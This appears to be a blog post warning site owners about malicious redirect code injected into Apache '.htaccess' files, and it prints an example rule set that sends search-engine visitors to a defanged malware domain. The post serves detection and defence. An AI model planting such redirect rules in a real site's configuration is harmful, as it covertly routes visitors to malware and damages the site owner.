Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.
One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.
About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.
Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.
Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.
How do I identify the malicious code
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.
This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.
04 | RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR] |
05 | RewriteCond %{HTTP_REFERER} .google.$ [NC,OR] |
06 | RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR] |
07 | RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR] |
08 | RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR] |
09 | RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR] |
10 | RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR] |
11 | RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR] |
12 | RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC] |
13 | RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L] |
How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites
No comments:
Post a Comment